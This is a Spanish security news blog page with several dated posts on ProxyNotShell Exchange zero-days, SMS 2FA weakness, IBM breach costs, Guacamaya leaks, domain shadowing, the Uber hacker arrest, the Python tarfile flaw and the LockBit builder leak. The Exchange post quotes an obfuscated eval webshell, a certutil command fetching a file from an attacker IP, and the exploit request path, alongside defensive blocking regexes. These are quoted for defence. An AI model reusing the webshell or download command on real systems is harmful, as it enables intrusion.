SAFE. Guía para proteger tu vida digital y tu privacidad

30 sept 2022

#ProxyNoShell: Vulnerabilidades Zero-Day en Exchange, utilizada in-the-wild

Aproximadamente a principios de agosto de 2022, mientras realizaba servicios de monitoreo de seguridad y respuesta a incidentes, el equipo de GTSC SOC descubrió que se estaba Microsoft Exchange 2013, 2016, 2019 on-prem e híbridas.

Durante la investigación, los expertos del GTSC Blue Team determinaron que el ataque utilizó una vulnerabilidad Zero-Day, por lo que inmediatamente se elaboró ​​un plan de contención temporal. Al mismo tiempo, los expertos de Red Team comenzaron a investigar y depurar el código descompilado de Exchange para encontrar la vulnerabilidad y explotar el código.

La vulnerabilidad resulta tan crítica que permite al atacante realizar RCE en el sistema comprometido. GTSC envió la vulnerabilidad a Zero Day Initiative (ZDI) de inmediato para trabajar con Microsoft para que se pudiera preparar un parche lo antes posible. ZDI verificó y reconoció 2 errores, cuyos puntajes CVSS son ZDI-CAN-18333 (8.8) y ZDI-CAN-18802 (6.3).

Las vulnerabilidades están siendo rastreadas por Microsoft como CVE-2022–41040 y CVE-2022–41082:

  • CVE-2022-41040 (8.8): It is a server-side request forgery (SSRF) vulnerability.
  • CVE-2022-41082 (8.8): Allows remote code execution (RCE) if the attacker has access to PowerShell

GTSC confirmó que otros sistemas también estaban siendo atacados con esta vulnerabilidad de día cero. Para ayudar a la comunidad a detener temporalmente el ataque antes de que esté disponible un parche oficial de Microsoft, publicaron este artículo dirigido a aquellas organizaciones que utilizan el sistema de correo electrónico de Microsoft Exchange.

 Información de vulnerabilidad

Para explotar esta vulnerabilidad se necesita un usuario autenticado. Inicialmente se detectan solicitudes de explotación en los registros de IIS con el mismo formato que la vulnerabilidad de ProxyShell. Incluso a esta vulnerabilidad Kevin Beaumont la está llamando ProxyNOTShell.

autodiscover/[email protected]/&Email=autodiscover/autodiscover.json%[email protected]

Luego, el atacante puede ejecutar comandos en el sistema atacado, acceder a un componente en el backend de Exchange y ejecutar un RCE. Aún NO se han publicado detalles técnicos de la vulnerabilidad.

Las mitigaciones son similares a ProxyShell:

Actividades posteriores a la explotación

Después de ejecutar el exploit, se registran ataques para recopilar información y crear un punto de apoyo en el sistema de la víctima. El equipo de ataque también utilizó varias técnicas para crear puertas traseras en el sistema afectado y realizar movimientos laterales a otros servidores del sistema.

Se han detectacto webshells, en su mayoría ofuscados, que se subian en los servidores de Exchange. El atacante utiliza Antsword, una herramienta china de código abierto que admite la administración de webshell.

<%@Page Language="Jscript"%>
<%eval(System.Text.Encoding.GetEncoding(936).GetString(System.Convert.FromBase64String('NTcyM'+'jk3O3'+'ZhciB'+'zYWZl'+
''+'P'+'S'+char(837-763)+System.Text.Encoding.GetEncoding(936).GetString(System.Convert.FromBase64String('MQ=='))+
char(51450/525)+''+''+char(0640-0462)+char(0x8c28/0x1cc)+char(0212100/01250)+System.Text.Encoding.GetEncoding(936).
GetString(System.Convert.FromBase64String('Wg=='))+'m'+''+'UiO2V'+'2YWwo'+'UmVxd'+'WVzdC'+'5JdGV'+'tWydF'+'WjBXS'+
'WFtRG'+'Z6bU8'+'xajhk'+'J10sI'+'HNhZm'+'UpOzE'+'3MTY4'+'OTE7'+'')));%>

Otra característica notable es que el atacante también cambia el contenido del archivo RedirSuiteServiceProxy.aspx (nombre de archivo legítimo disponible en el servidor de Exchange) por el contenido de la webshell.

Además de recopilar información sobre el sistema, el atacante descarga archivos y verifica las conexiones a través de certutil, otra herramienta legítima de Windows.

“cmd” /c cd /d "c:\\PerfLogs"&certutil.exe -urlcache -split -f http://206.188.196.77:8080/themes.aspx c:\perflogs\t&echo [S]&cd&echo [E]
"cmd" /c cd /d "c:\\PerfLogs"&certutil.exe -urlcache -split -f https://httpbin.org/get c:\test&echo [S]&cd&echo [E]

Cabe señalar que cada comando termina con la cadena echo [S]&cd&echo [E], que es una de las firmas de China Chopper webshell.

Además, el delincuente también inyecta archivos DLL maliciosos en la memoria, coloca archivos sospechosos en los servidores atacados y ejecuta estos archivos a través de WMIC.

A continuación se presentan los indicadores de compromiso detectados (IOCs)

Prevención y mitigación

Como medida temporal (confirmada por Microsoft), y mientras se espera por el parche oficial por parte de Microsoft, se recomienda añadir una regla de bloqueo en el módulo URL Rewrite Rule de IIS.

NOTA: En SO menores a Windows Server 2016, es necesario instalar KB2999226 para que el IIS Rewrite Module 2.1 funcione.

  1. En «Autodiscover» en «FrontEnd» seleccione la pestaña «URL Rewrite» y luego «Request Blocking».
  2. Agregue la siguiente cadena en «URL Path»: ".*autodiscover\.json.*\@.*Powershell.*" (sin comillas)
  3. Actualización 04/10: agregue la siguiente cadena en «URL Path»: "(?=.*autodiscover)(?=.*powershell)" (sin comillas)
  4. En «Condition» cambie {URL} por {REQUEST_URI}.
  5. En «Using» marcar «Regular Expressions».

La publicación de Microsoft sobre Web Shell Threat Hunting con Microsoft Sentinel también proporciona una guía válida para buscar web shells en general.

Para ayudar a las organizaciones a verificar si sus servidores Exchange ya han sido explotados por este error, GTSC ha publicado una guía y una herramienta para escanear archivos de registro de IIS (almacenados de manera predeterminada en la carpeta %SystemDrive%\inetpub\logs\LogFiles):

Usar powershell:

Get-ChildItem -Recurse -Path  -Filter "*.log" |
    Select-String -Pattern 'powershell.*autodiscover\.json.*\@.*200'

O, se puede ejecutar la herramienta desarrollada para la detección de esta vulnerabilidad:

Los clientes de Microsoft Exchange Online no necesitan realizar ninguna acción. Los clientes locales de Microsoft Exchange deben revisar y aplicar las instrucciones de reescritura de URL previas. Microsoft ha publicado un script (version 22.10.03.1829) para aplicar estas mitigaciones contra la vulnerabilidad SSRF CVE-2022-41040. Este script requiere PowerShell 3+ y permisos de Administrador sobre IIS 7.5+.

La empresa también ha confirmado que las instrucciones de reescritura de URL discutidas públicamente pueden romper las cadenas de ataque actuales.

Como medidas de prevención adicionales, la compañía insta a las empresas a aplicar la autenticación multifactor (MFA ), deshabilitar la autenticación heredada y educar a los usuarios sobre cómo no aceptar solicitudes inesperadas de autenticación de dos factores (2FA).

De acuerdo a Shodan (otro), actualmente puede haber más de 200.000 servidores potencialmente expuestos. Se puede realizar la búsqueda como http.component:"outlook web app" y filtrar por ORG:"nombre_empresa" o por SSL:"*nombre*".

Actualización 02/10

  • Recomendamos enfáticamente a los clientes de Exchange Server que deshabiliten el acceso remoto a PowerShell para usuarios que no sean administradores en su organización. La guía sobre cómo hacer esto para un solo usuario o múltiples usuarios está aquí.
  • Se actualizó la sección detección de las las vulnerabilidades de Exchange CVE-2022-41040 y CVE-2022-41082.
  • Germán Fernández (aka @1ZRR4H) ha publicado un script NMAP para la detección de la vulnerabilidades.

Actualización 04/10

El investigador de seguridad Jang en un tweet de hoy muestra que la solución temporal de Microsoft para prevenir la explotación de CVE-2022-41040 y CVE-2022-41082 no es eficiente y se puede eludir con poco esfuerzo. Will Dormann, analista senior de vulnerabilidades de ANALYGENCE, está de acuerdo (video)con el hallazgo y dice que la '@' en el bloque de URL de Microsoft "parece innecesariamente preciso y, por lo tanto, insuficiente". Por eso la cadena original se ha modificado a .*autodiscover\.json.*Powershell.*

Muchas organizaciones tienen una configuración híbrida que combina la implementación local con la nube de Microsoft Exchange y deben comprender que también son vulnerables.

En un video de hoy, el investigador de seguridad Kevin Beaumont advierte que mientras haya una implementación de Exchange Server en las instalaciones, la organización está en riesgo.

Fuentes: GTSC | Microsoft

Más información:

29 sept 2022

Los SMS son la forma "más vulnerable" de verificación en dos pasos [CertiK]

El nivel de seguridad que proporcionan los SMS palidece en comparación con los autentificadores o las claves de seguridad físicas, afirma Jesse Leclere, de CertiK, en una entrevista.

El uso de SMS como una forma de autenticación de dos factores siempre ha sido popular entre los entusiastas de las criptomonedas. Después de todo, muchos usuarios ya comercian con sus criptomonedas o gestionan páginas sociales en sus teléfonos, así que ¿por qué no utilizar simplemente los SMS para verificar cuando se accede a contenido financiero sensible?

Desgraciadamente, los estafadores se han dado cuenta últimamente de que pueden explotar la riqueza enterrada bajo esta capa de seguridad a través del intercambio de SIM, o el proceso de redirigir la tarjeta SIM de una persona a un teléfono que está en posesión de un atacante. En muchas jurisdicciones de todo el mundo, los empleados de telecomunicaciones no piden identificación gubernamental, ni facial, ni números de la seguridad social para gestionar una simple solicitud de portabilidad.

Combinado con una rápida búsqueda de información personal disponible públicamente (bastante común para los interesados en la Web 3.0) y preguntas de recuperación fáciles de adivinar, los suplantadores pueden portar rápidamente el 2FA por SMS de una cuenta a su teléfono y empezar a utilizarlo con fines nefastos. A principios de este año, muchos youtubers de criptomonedas fueron víctimas de un ataque de intercambio de SIM en el que los atacantes publicaron vídeos de estafa en su canal con un texto que dirigía a los espectadores a enviar dinero a la billetera del atacante. En junio, el proyecto de NFT de Solana, Duppies, sufrió una violación de su cuenta oficial de Twitter a través de un intercambio de SIM en el que los atacantes tuiteaban enlaces a una falsa casa de la moneda.

Con respecto a este asunto, Cointelegraph habló con el experto en seguridad de CertiK, Jesse Leclere. Conocido como líder en el espacio de seguridad de blockchain, CertiK ha ayudado a más de 3.600 proyectos a asegurar activos digitales por valor de USD 360.000 millones y ha detectado más de 66.000 vulnerabilidades desde 2018. Esto es lo que dijo Leclere:

"La 2FA por SMS es mejor que nada, pero es la forma más vulnerable de 2FA que se utiliza actualmente. Su atractivo radica en su facilidad de uso: la mayoría de la gente está en su teléfono o lo tiene a mano cuando se conecta a las plataformas online. Pero no hay que subestimar su vulnerabilidad a los intercambios de tarjetas SIM".

Leclerc explicó que las aplicaciones dedicadas a la autenticación, como Google Authenticator, Authy o Duo, ofrecen casi toda la comodidad de las 2FA por SMS al tiempo que eliminan el riesgo del intercambio de SIM. A la pregunta de si las tarjetas virtuales o eSIM pueden eliminar el riesgo de ataques de phishing relacionados con el intercambio de SIM, Leclerc respondió claramente que no:

"Hay que tener en cuenta que los ataques de intercambio de SIM se basan en el fraude de identidad y la ingeniería social. Si un agente malicioso puede engañar a un empleado de una empresa de telecomunicaciones para que piense que es el propietario legítimo de un número vinculado a una SIM física, también puede hacerlo con una eSIM".

Aunque es posible disuadir este tipo de ataques bloqueando la tarjeta SIM en el teléfono (las compañías de telecomunicaciones también pueden desbloquear los teléfonos), Leclere señala que el estándar de oro es el uso de llaves de seguridad físicas. "Estas llaves se conectan al puerto USB del ordenador, y algunas están habilitadas para la comunicación de campo cercano (NFC) para facilitar su uso con dispositivos móviles", explica Leclere. "Un atacante necesitaría no solo conocer tu contraseña, sino apoderarse físicamente de esta llave para poder entrar en tu cuenta".

Leclere señala que después de ordenar el uso de las claves de seguridad para los empleados en 2017, Google ha experimentado cero ataques de phishing con éxito. "Sin embargo, son tan eficaces que si pierdes la única llave que está vinculada a tu cuenta, lo más probable es que no puedas volver a acceder a ella. Es importante mantener varias llaves en lugares seguros", añadió.

Por último, Leclere afirma que, además de utilizar una aplicación de autenticación o una clave de seguridad, un buen gestor de contraseñas facilita la creación de contraseñas fuertes sin reutilizarlas en varios sitios. "Una contraseña fuerte y única combinada con un 2FA no SMS es la mejor forma de seguridad para las cuentas", afirmó.

Fuente: CoinTelegraph

27 sept 2022

Los consumidores pagan el precio de las filtraciones de datos [IBM]

IBM Security publicó su informe anual Cost of a Data Breach Report 2022 (español), que revela que las filtraciones de datos son más costosas y tienen mayor impacto que nunca, con un costo promedio de USD 2.09 millones de dólares en América Latina, el mayor costo en la historia del informe para las organizaciones encuestadas.

En la región, con un aumento de los costos por filtraciones de datos de casi un 15% comparado con el año anterior, los hallazgos sugieren que estos incidentes también pueden estar contribuyendo al aumento de los precios en bienes y servicios. De hecho, el 60% de las organizaciones a nivel global incrementaron los precios de sus productos o servicios debido a una filtración, en un momento en el que el costo de los bienes ya se está disparando en todo el mundo por la inflación, los problemas de la cadena de suministro, entre otros.

Por otro lado, el tiempo promedio en la región para identificar y contener una filtración de datos fue de 331.5 días en 2022, una reducción de casi 25 días en comparación con el año anterior. Además, la perpetuidad de los ciberataques también está arrojando luz sobre el “efecto perseguidor” que las filtraciones de datos están teniendo en las empresas, ya que el informe de IBM revela que el 83% de las organizaciones a nivel mundial experimentaron más de una filtración de datos en su vida.

Por duodécimo año consecutivo, los participantes de la industria de salud sufrieron las filtraciones más costosas de todos los sectores a nivel mundial, seguida por los servicios financieros. En América Latina, las industrias que observaron el mayor costo por registro en una filtración son salud (USD 128), servicios financieros (USD 124) y el sector servicios (USD 111).

Además, el 45% de las empresas en América Latina tienen un nivel de adopción maduro de Zero Trust (enfoque de Confianza Cero). Esta estrategia es importante ya que, globalmente, entre las organizaciones con una implementación madura de Zero Trust en su arquitectura de seguridad y aquellas que recién están comenzando, la diferencia de costos en la filtración fue de más de USD 1.5 millones de dólares.

El informe "Cost of a Data Breach 2022" -patrocinado y analizado por IBM Security, realizado por Ponemon Institute- se basa en un análisis en profundidad de las filtraciones de datos reales experimentadas por 550 organizaciones a nivel mundial -66 empresas de América Latina- entre marzo de 2021 y marzo de 2022.

Infraestructura crítica

  • El ransomware y los ataques destructivos representaron el 28% de las filtraciones en las organizaciones de infraestructuras críticas estudiadas, lo que pone de manifiesto que los atacantes buscan fracturar las cadenas de suministro globales que son la columna vertebral de la economía.
  • El costo global promedio de una filtración de datos para estas organizaciones fue de USD 4.82 millones de dólares, mayor que el promedio mundial (USD 4.35 millones de dólares).
  • Casi el 80% de las organizaciones de infraestructuras críticas no adoptaron estrategias Zero Trust, por lo que el costo medio de las filtraciones de datos aumenta hasta los USD 5.4 millones de dólares, un incremento de 24% en comparación con las que sí lo hacen.
  • Además, en el 17% de las infracciones, un socio comercial se vio inicialmente comprometido, lo que pone de manifiesto los riesgos de seguridad que plantean los entornos de confianza excesiva.

No es rentable pagar el rescate:

  • Las víctimas del ransomware del estudio que optaron por pagar el rescate sólo vieron una disminución de USD 630.000 dólares en el costo promedio de la filtración en comparación con aquellas que no lo hicieron, sin incluir el costo del rescate.
  • Si se tiene en cuenta el elevado precio de los rescates (mayor a USD 800.000 dólares), el costo financiero puede ser aún mayor, lo que sugiere que la acción de pagar el rescate, por si sola, no es una estrategia eficaz; mientras que además podrían estar financiando inadvertidamente futuros ataques con el capital que sería útil para esfuerzos de corrección y recuperación, e incluso se podría incurrir en posibles delitos federales.
  • IBM Security X-Force descubrió que la duración de los ataques de ransomware descendió 94% en los últimos 3 años -pasó de 2 meses a menos de 4 días- por lo que los equipos de seguridad tienen menos margen de acción.
  • En el caso de filtraciones de datos causadas por ransomware y ataques destructivos, el tiempo promedio para identificar y contener es significativamente mayor que la media global. Para un ransomware fue de 49 días más y en ataques destructivos fue de 47 días más, frente al promedio global de 277 días.

Factores y vectores en la filtración de datos:

  • Las credenciales comprometidas continúan siendo la causa más común de una filtración (19%), con un costo promedio de USD 4.5 millones de dólares. También tienen el ciclo de vida más largo: 327 días para identificar y contener.
  • El phishing fue la segunda (16%) y la más costosa, con un promedio de USD 4.91 millones de dólares en las organizaciones estudiadas. BEC (Business Email Compromise) alcanza 6% y es la segunda causa más costosa con USD 4.89 millones de dólares.
  • Tres factores principales que amplifican el costo de la filtración: complejidad del sistema de seguridad, migración a la nube y fallas de compliance.
  • Tres principales mitigadores de costos: uso de plataforma de Inteligencia Artificial para seguridad, DevSecOps y formación del equipo de Respuesta a Incidentes.

Profesionales, Automatización e IA en seguridad son clave para el ahorro de costos multimillonarios:

  • Las organizaciones que desplegaron completamente la automatización y la IA en seguridad incurrieron en un costo promedio menor y lograron un ahorro de 65.2% frente a las que no -el mayor ahorro de costos observado en el estudio. Además su tiempo de detección y contención es menor: 2.5 meses más rápido.
  • El 62% de las organizaciones admitió no tener suficiente personal para cubrir las necesidades relacionadas con la seguridad, lo que se traduce en una media de USD 550.000 dólares más en costos de filtraciones frente a las que sí cuentan con los recursos profesionales.
  • El 73% de las empresas tiene planes de Respuesta a Incidentes, pero el 37% no lo prueba regularmente. Se observa un ahorro del 58% en costo promedio por filtración de datos para las organizaciones que tienen equipo de Respuesta a Incidentes y prueban periódicamente su plan.
  • El 44% de las organizaciones utilizan tecnologías XDR (Extended Detection and Response) y acortaron el ciclo de vida de las filtraciones en casi un mes. Además ahorraron una media de USD 400.000 dólares.

Ventaja de la nube híbrida:

  • Un significativo 43% de las organizaciones estudiadas están en las primeras etapas o no han empezado a aplicar prácticas de seguridad para proteger sus entornos de nube.
  • Ahorro y Rapidez. Las empresas con entornos maduros de seguridad en la nube ahorraron 16% en el costo promedio para las filtraciones de datos. Además, son capaces de detectar y contener más rápido: 40 días menos que el promedio global.
  • Las empresas que adoptaron la nube híbrida notaron costos menores (USD 3.8 millones de dólares en promedio) en comparación con aquellas con un modelo de nube exclusivamente pública (USD 5.02 millones de dólares) o privada (USD 4.24 millones de dólares).
  • De hecho, las organizaciones con un entorno de nube híbrida fueron capaces de identificar y contener las filtraciones de datos 15 días más rápido que la media global de 277 días.

"Las empresas necesitan poner sus sistemas de seguridad a la ofensiva y vencer a los atacantes. Es hora de impedir que el adversario consiga sus objetivos y empezar a minimizar el impacto de los ataques. Cuanto más intenten las empresas perfeccionar su perímetro en lugar de invertir en la detección y la respuesta, mayor será el número de filtraciones de datos que pueden provocar aumentos en el costo de vida", comentó Charles Henderson, Director Global de IBM Security X-Force. "Este informe muestra que las estrategias correctas y las tecnologías adecuadas pueden ayudar a marcar la diferencia cuando las empresas son atacadas".

Fuente: DiarioTI

26 sept 2022

Guacamaya: grupo responsable de divulgar 10T de datos de diferentes países de Latinoamérica

Conocido como Guacamaya, este grupo de delincuentes informáticos supuestamente es el responsable de filtrar cerca de 10 Terabytes de correos electrónicos de organizaciones militares y policiales en varios países de Centro y Sudamérica, incluido uno del Estado Mayor Conjunto (EMCO) de las Fuerzas Armadas de Chile. La filtración contiene 400.000 correos electrónicos del Ministerio de Defensa.

"Filtramos sistemas militares y policiales de México, Perú, Salvador, Chile, Colombia y entregamos esto a quienes legítimamente hagan lo que puedan con estas informaciones. ", declaró el grupo, que preparó su acción en un operativo denominado "Fuerzas Represoras".

Según CyberScope, sitio especializado en ciberseguridad, esta filtración de datos es la última acción de Guacamaya, un grupo enfocado en infiltrarse en empresas mineras y petroleras, policías y diversas agencias reguladoras latinoamericanas desde marzo de 2022.

La filtración del grupo, que se hace llamar guacamaya por un ave nativa de América Central y del Sur, sigue un patrón de apuntar a entidades que el grupo cree que son responsables de la degradación ambiental del área y la supresión de las poblaciones nativas.

En agosto, Guacamaya publicó más de 2 terabytes de correos electrónicos y archivos de una gran cantidad de empresas mineras en Centro y Sudamérica.

Algunos de los datos filtrados son: Datos del Estado Mayor Conjunto de las Fuerzas Armadas de Chile, Comando General de las Fuerzas Armadas de Colombia, Policía Nacional Civil de El Salvador y Comando Conjunto de las Fuerzas Armadas de El Salvador, la Defensa Nacional Secretaría de México.

Por ejemplo, los materiales chilenos se publicaron en DDoSecrets, un sitio que aloja datos filtrados, publicando algunos directamente y compartiendo otros conjuntos más sensibles de interés público, con periodistas e investigadores, como en el caso del material restante. Este es el cuarto lanzamiento de Guacamaya desde marzo y todos los datos publicados están en Enlace Hacktivista, un sitio web dedicado a documentar la historia de estos delincuentes informáticos, compartir recursos educativos sobre seguridad de la información.

"Para que quede claro, los ejércitos militares y las fuerzas policiales de los Estados de Abya Yala, son la garantía de dominio del imperialismo norteamericano, son garantía de la presencia extractivista del Norte Global. Son fuerzas represoras violentas, criminales en contra de los propios pueblos y sus organigramas piramidales internos de poder también son repudiables.", dijo el grupo en un comunicado.

"Lo que realmente queremos, como nos advierte nuestra propia madre, es detener esto", dice el comunicado de Guacamaya. "Queremos que paren de una vez por todas, que paren la explotación, la minería, la contaminación, el afán de dominación".

Fuente: NationWorldNews | CyberScoop

Domain shadowing: creación de subdominios dañinos en dominios confiables

Los analistas de amenazas de Palo Alto Networks (Unit 42) descubrieron que el fenómeno de la "Domain shadowing" podría ser más frecuente de lo que se pensaba anteriormente, descubriendo 12.197 casos mientras escaneaban la web entre abril y junio de 2022.

"Domain shadowing" es una subcategoría del secuestro de DNS, donde los actores de amenazas comprometen el DNS de un dominio legítimo para alojar sus propios subdominios para usarlos en actividades maliciosas, pero no modifican las entradas de DNS legítimas que ya existen.

Luego, estos subdominios se utilizan para crear páginas maliciosas en los servidores de los ciberdelincuentes, mientras que las páginas web y los registros DNS del sitio del propietario del dominio permanecen sin cambios, y los propietarios no se dan cuenta de que han sido atacados y vulnerados.

Mientras tanto, los actores de amenazas son libres de alojar direcciones de C2 (Comando y Control), sitios de phishing y puntos de lanzamiento de malware, abusando de la buena reputación del dominio secuestrado para eludir los controles de seguridad.

En teoría, los atacantes pueden cambiar los registros DNS para atacar a los usuarios y propietarios de los dominios comprometidos, pero normalmente prefieren tomar el camino sigiloso descrito anteriormente.

Ataque difícil de detectar

Unit 42 explica que detectar casos reales de "Domain shadowing" es particularmente desafiante, lo que hace que la táctica sea muy atractiva para los perpetradores.

Los analistas mencionan que VirusTotal marcó solo 200 dominios como maliciosos de los 12.197 dominios descubiertos por Palo Alto.

La mayoría (151) de las detecciones de VirusTotal estaban relacionadas con una única campaña de phishing que utilizaba una red de 649 dominios ocultos en 16 sitios web comprometidos. "Concluimos a partir de estos resultados que esta es una amenaza activa para la empresa y es difícil de detectar sin aprovechar los algoritmos de aprendizaje automático automatizados que pueden analizar grandes cantidades de registros de DNS".

Además, las páginas de phishing alojadas en dominios con buena reputación parecerían confiables para un visitante, lo que aumentaría la probabilidad de que envíe datos en la página.

Seguimiento de la campaña de phishing

La campaña de phishing descubierta por los investigadores de Palo Alto comprometió 16 dominios para crear 649 subdominios, alojando páginas de inicio de sesión falsas o puntos de redirección a páginas de phishing.

Los subdominios que redirigen a los sitios de phishing pueden eludir fácilmente los filtros de seguridad del correo electrónico, ya que no alojan nada malicioso y tienen una reputación benigna.

Los actores de amenazas apuntan a las credenciales de la cuenta de Microsoft y, aunque la URL claramente no está relacionada con Microsoft, no activará advertencias de las herramientas de seguridad de Internet.

En un caso, los propietarios del dominio se dieron cuenta del compromiso, pero no antes de que se crearan numerosos subdominios y facilitaran operaciones maliciosas en su infraestructura.

Si bien la protección contra subdominios no autorizados es responsabilidad de los propietarios de dominios, los registradores y los proveedores de servicios de DNS, sería prudente que los usuarios siempre tuvieran cuidado al enviar datos.

Esto incluye la posibilidad de que un subdominio en un dominio conocido pueda ser malicioso y que los usuarios verifiquen todo dos veces antes de enviar credenciales u otra información confidencial.

Fuente: BC

24 sept 2022

Arrestan al posible atacante de Uber y Rockstar (¿Lapsus$?)

La policía de la ciudad de Londres reveló el viernes que arrestó a un adolescente de 17 años de Oxfordshire bajo sospecha de ataques informáticos. "En la noche del jueves 22 de septiembre de 2022, la policía de la ciudad de Londres arrestó a un joven de 17 años en Oxfordshire bajo sospecha de piratería y el mismo permanece bajo custodia policial".

El departamento dijo que el arresto se realizó como parte de una investigación en asociación con la unidad de delitos cibernéticos de la Agencia Nacional contra el Crimen del Reino Unido.

No se revelaron más detalles sobre la naturaleza de la investigación, aunque se sospecha que la acción policial puede tener algo que ver con la reciente serie de hacks de alto perfil dirigidos a Uber y Rockstar Games.

Se alega que ambas intrusiones fueron cometidas por el mismo actor de amenazas, que se hace llamar Tea Pot (también conocido como teapotuberhacker). Uber, por su parte, ha atribuido la violación a un atacante (o atacantes) que cree que está asociado con la pandilla de extorsión LAPSUS$, dos de los cuales enfrentan cargos por fraude.

Según la empresa de ciberseguridad Flashpoint, se dice que la identidad real del ataque detrás de los dos incidentes se reveló en un foro ilícito en línea. "El administrador de ese foro afirmó que teapotuberhacker era el mismo individuo que supuestamente había pirateado a Microsoft y había tomado el control de Doxbin", reveló la compañía el viernes.

En marzo de este año, BBC News informó sobre un joven de 16 años de Oxford conocido en línea como "White" o "Breachbase", que fue acusado de ser uno de los líderes del grupo LAPSUSU$. Esto también significa que el actor teapotuberhacker es probablemente el mismo que también es conocido por los alias White, Breachbase y WhiteDoxbin y se cree que es el "líder aparente de LAPSUS$".

No está claro de inmediato si estas acusaciones son válidas, pero de ser ciertas, podrían explicar el último arresto por parte de los agentes del orden.

Fuente: THN

22 sept 2022

import tarfile: error de 15 años sin parche en Python

Una vulnerabilidad en el lenguaje de programación Python que se ha pasado por alto durante 15 años ahora vuelve a ser el centro de atención, ya que probablemente afecta a más de 350.000 repositorios de código abierto y puede conducir a la ejecución de código.

Revelado en 2007 y etiquetado como CVE-2007-4559, el problema de seguridad nunca recibió la atención necesaria ni el parche, la única mitigación proporcionada fue una actualización de la documentación que advertía a los desarrolladores sobre el riesgo.

La vulnerabilidad se encuentra en el paquete tarfile de Python, en el código que utiliza la función tarfile.extract() no sanitiazada o en los valores predeterminados integrados de tarfile.extractall(). Es un error de path traversal que permite a un atacante sobrescribir archivos de forma arbitraria.

Los detalles técnicos de CVE-2007-4559 han estado disponibles desde el informe inicial en agosto de 2007. Si bien no hay informes sobre el aprovechamiento del error en los ataques, representa un riesgo en la cadena de suministro de software.

A principios de este año, mientras investigaba otro problema de seguridad, un investigador de Trellix redescubrió CVE-2007-4559

. "Si no se realiza ninguna acción para limpiar los nombres de los archivos antes de solicitar tarfile.extract() o tarfile.extractall(), se genera una vulnerabilidad de path traversal, lo que permite que un actor malintencionado acceda al sistema de archivos" dijo Charles McFarland, investigador de vulnerabilidades en el Equipo de investigación de amenazas avanzadas de Trellix

En 2007, menos de una semana después de la divulgación, un mensaje de Python anunció que el problema estaba solucionado: la solución fue actualizar la documentación con una advertencia "que podría ser peligroso extraer archivos de fuentes no confiables".

Estimación de 350.000 proyectos afectados

Al analizar el impacto, los investigadores de Trellix descubrieron que la vulnerabilidad estaba presente en miles de proyectos de software, tanto de código abierto como cerrado.

Los investigadores rastrearon un conjunto de 257 repositorios con mayor probabilidad de incluir el código vulnerable y verificaron manualmente 175 de ellos para ver si estaban afectados. Esto reveló que el 61% de ellos eran vulnerables. La ejecución de una verificación automatizada en el resto de los repositorios aumentó la cantidad de proyectos afectados al 65%, lo que indica un problema generalizado.

Sin embargo, el pequeño conjunto de muestras solo sirvió como referencia para obtener una estimación de todos los repositorios afectados disponibles en GitHub. "Con la ayuda de GitHub, pudimos obtener un conjunto de datos mucho más grande para incluir 588.840 repositorios únicos que incluyen 'import tarfile' en su código Python" dijo Charles McFarland

Usando la tasa de vulnerabilidad del 61% verificada manualmente, Trellix estima que hay más de 350.000 repositorios vulnerables, muchos de ellos utilizados por herramientas de aprendizaje automático (por ejemplo, GitHub Copilot) que ayudan a los desarrolladores a completar un proyecto más rápido.

En una publicación del blog, el investigador de vulnerabilidades de Trellix, Kasimir Schulz, quien redescubrió el error, describió los pasos simples para explotar CVE-2007-4559 en la versión de Windows de Spyder IDE, un entorno de desarrollo integrado multiplataforma de código abierto para programación científica.

Los investigadores demostraron que la vulnerabilidad también se puede aprovechar en Linux. Lograron escalar la escritura de archivos y lograr la ejecución del código en el producto Polemarch,

Además de llamar la atención sobre la vulnerabilidad y el riesgo que representa, Trellix también creó parches para poco más de 11.000 proyectos. Las correcciones estarán disponibles en un branch del repositorio afectado y se agregarán al proyecto principal a través un pull.

Debido a la gran cantidad de repositorios afectados, los investigadores esperan que más de 70.000 proyectos reciban una solución en las próximas semanas. Sin embargo, alcanzar la marca del 100% es un desafío difícil, ya que los mantenedores también deben aceptar las solicitudes de fusión.

Fuente: BC

21 sept 2022

"Empleado" descontento filtra el cifrador del ransomware LockBit Black (3.0)

La operación del ransomware LockBit sufrió una brecha de datos y un desarrollador supuestamente descontento filtró la última versión del generador del cifrador de la banda.

Después de probarlo durante dos meses, en junio, la operación de ransomware LockBit lanzó la versión 3.0 de su cifrador, cuyo nombre en código es LockBit Black. La nueva versión prometía "Hacer que el ransomware volviera a ser grandioso", agregando nuevas características contra el análisis, un programa de recompensas por errores de ransomware y nuevos métodos de extorsión.

Sin embargo, parece que LockBit ha sufrido una brecha, con dos personas (o tal vez la misma persona) filtrando el constructor LockBit 3.0 en Twitter.

Según el investigador de seguridad 3xp0rt, un usuario de Twitter recién registrado llamado "Ali Qushji" afirma que su equipo hackeo los servidores de LockBit y encontró un generador para el cifrador de de LockBit 3.0. VX-Underground también compartió que un usuario llamado "protonleaks" los contactó el 10 de septiembre y también compartió una copia del constructor. Sin embargo, VX-Underground dice que "LockBitSupp", el representante público de la operación LockBit, afirma que no fueron hackeados, sino que un desarrollador descontento filtró el generador de ransomware privado.

BleepingComputer ha hablado con varios investigadores de seguridad que han confirmado que el constructor es legítimo.

El Builder permite que cualquiera inicie una banda de ransomware

Independientemente de cómo se filtró el generador de ransomware privado, esto no solo es un duro golpe para la operación del ransomware LockBit, sino también para las empresas, que verán un aumento en los actores de amenazas que lo utilizan para lanzar sus propios ataques.

El constructor filtrado de LockBit 3.0 permite que cualquier persona construya rápidamente los ejecutables necesarios para iniciar su propia operación, incluido un cifrador, un descifrador y herramientas especializadas para iniciar el descifrador de ciertas maneras.

El constructor consta de cuatro archivos, un generador de claves de cifrado, un constructor, un archivo de configuración modificable y un archivo por lotes para crear todos los archivos.

Al modificar el archivo de configuración, cualquier actor de amenazas puede personalizarlo según sus propias necesidades y modificar la nota de rescate creada para vincularla a su propia infraestructura.

No es la primera vez que se filtra en línea un generador de ransomware o el código fuente, lo que genera un aumento de los ataques de otros actores de amenazas que lanzaron sus propias operaciones.

En junio de 2021, se filtró el generador de ransomware Babuk, que permite a cualquier persona crear encriptadores y desencriptadores para Windows y VMware ESXi, que otros actores de amenazas utilizaron en los ataques.

En marzo de 2022, cuando la operación del ransomware Conti sufrió una filtración de datos, su código fuente también se filtró en línea. Este código fuente fue utilizado rápidamente por el grupo de hacking NB65 para lanzar ataques de ransomware en Rusia.

Fuente: BC

20 sept 2022

Spell-jacking: Chrome y Edge transmiten contraseñas a través de su función de corrector ortográfico

